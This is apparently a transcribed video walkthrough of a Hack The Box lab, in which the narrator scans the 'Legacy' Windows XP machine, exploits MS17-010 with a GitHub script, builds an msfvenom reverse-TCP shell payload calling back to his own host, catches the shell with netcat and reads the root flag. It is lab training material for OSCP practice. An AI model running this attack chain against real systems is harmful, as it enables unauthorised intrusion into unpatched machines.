Hello all, welcome to Global Offensive Hacker Associate community and welcome to another hacking episode of Hacker Associate. In this video, we are going to see how we can root this machine called Legacy using manual exploitation. I am Harshad, founder and CEO of Hacker Associate. Let's begin. So first, as I mentioned here, we have Legacy machine and the IP address is 10.10.10.4. So first we can ping this machine. Let me check everything is working. So this reply is coming, it means it's working. After that, you can use this command for port enumeration like nmap minus s capital C minus s capital V minus P minus, and if you want output you can use minus OA and then file name, example let's say file port, and you can use IP address 10.10.10.4. You can just try this command, identify all the open ports. In my case I have already done this thing, so I'm not repeating this step, and you can check this is output. I have converted into HTML format and look like this. So here we have a two port 139 and 445, and here you can see the XP machine, and as we already know the XP machine is vulnerable to MS08067 net API. So you can go to the Google and you can search for the exploit. Otherwise you can go to Metasploit and you can search it here, but right now we want to focus on manual exploitation rather than automation part. So now how to identify the other vulnerability related to this. So what I can do here is I can go to my terminal and I'll show you what command I have used here. So you can see clearly I have used this command called is sudo nmap minus script and then this vulnerability on port 445 and then IP address. And here you can see clearly this particular machine is vulnerable to SMB vulnerability here, MS08067. It is vulnerable, you can see clearly. Second vulnerability we have called as an MS17010. So you can copy that part here. And basically this vulnerability, if you can check here, is a remote code execution vulnerability in Microsoft SMB version 1 server. Now what you need to do here is you need to go to the Google and you can search for the exploit. So you can see here, right, Microsoft SMB version 1 server exploit. So right now you can see there are many documentation came here. So what I can do here is I can only just type MS17010 exploit GitHub. You can search. You can see there are a lot of scripts are available that you can download it here. In my case I have already downloaded. I'll show you. So I'll go back to my terminal, open a new tab. And if you can go here, CD, in my desktop I have a Sublime, and then under STB I have a Legacy machine. After that LS, you can see this is the folder, which I have downloaded, from GitHub. After that, what you need to do here is you can go to the MS17 folder which you have downloaded from GitHub, and here there are varieties of scripts are available there. So I am interested in this script called send and execute py. So how to run it? You can use Python send and execute py and press enter. So when you press enter here, you can see you require exe file and then port. So we don't have exe right now. So what I can do here is I can open a new tab again, and I will go to Metasploit and create a shell here. So opt ls cd Metasploit framework cd, we have a bin, and ls /msf console, enter. So let's see how we can execute this thing. So I want to type yes. It will take a time a little bit, just wait for it. So here you can see here clearly, I just type msf console to initialize my database. So now it is here, but I don't want to use Metasploit, as I mentioned to you, like in the beginning of the video. We want to exploit this machine using a manual exploit. So what I can do here is I can switch to my this framework, and I will create a payload using a MSF Venom. So how to use it? You can use MSF Venom, and then after that you can use a P for payload. Then we need Windows shell _reverse _TCP, then lhost equal to, and we require lport equal to, we'll put 5555. After that we require F and then exe, and then you can create a file. So I'm creating a file under the desktop, Sublime, HTB. Under STB I have a Legacy machine, and there I have folder called MS17010, and then I'll put example the same only MS17. So I'll easily remember the thing. 17010. dot exe. Okay, but I require what? I require the IP address. So let me split okay this terminal. So split vertically and let's check the IP address of my system. So my IP address is 10.10.14.5. I'll exit from here. Okay, so let's go back here and enter our IP address. So lhost we have a 10.10.14.5. okay, and after that everything is done, then you can simple press enter and just wait for it. Okay, it automatically going to export okay this exe file okay inside this. So now okay we have a exe inside this. So what we can do here is we can simple go to our second terminal shell. Let me check what is on the third one. Okay, we are here right now. Okay, so we need to type ls command here, and here if you can check there is one file called as in this one, right? This one ms17010exe. I'll check the permission first. Okay, and here we don't have anything. So here what I give a permission. So sudo chmod plus x and I use ms17 exe. I need to enter my credential. So when it is done, then you can see its color changed, and after that I will try okay like python okay send and execute, and I use the port number call as in 5555, right? So example, let's say go back here, the last terminal which you have worked on, the port is 5555. okay, go to the second terminal and sorry, go to here, and here we have this one. Now the requirement here, we require the IP address. So this IP address will be the remote IP address. So remote IP address will be 10.10.10.4, and we require the exe. So exe will be ms17, and here we have. After that I'll okay split this thing okay vertically, and I'll use nc for listening, and my port number is 5555. Press enter. Is listening. Okay, and let me just drag this side and clear the screen. When you press enter, let's see okay like we're able to get the connection or not. I think we got the connection. See here, we are now able to receive the connection here shortly. Just wait for it. So when this part is done, okay, you will be able to see here the shell. That's how you approach this thing. Okay, so manual exploration is best if you are preparing for OSCP exam. And right now you can say I got the shell, and if I just type who am I think it will not work here in this case. So for that particular purpose you can use system info. Okay, or sysinfo you can try like that. You can see legacy machine, and this is here, and we need to go to the cd, we need to go to the c/users, we need to go. Okay, that path is not available there. Let me again try cd c/users, also not going. Let me just type on this cdc, then type dir. Then we have here documents and setting. Let me go to the cd, that location I need to go. You can simple copy it here, and you can simple paste dir. Let me do little bit bigger okay for you. So I need to go to the cd, and here is the administrator. Okay, and then after the dir, and here we have a desktop. cd we type desktop dir, and after that you can see we have a root file here. Type root.txt. okay, that's how okay you need to approach okay this machine. I hope this video is informative for you. Thank you for watching the video. Have a great day. See you soon in the next episode.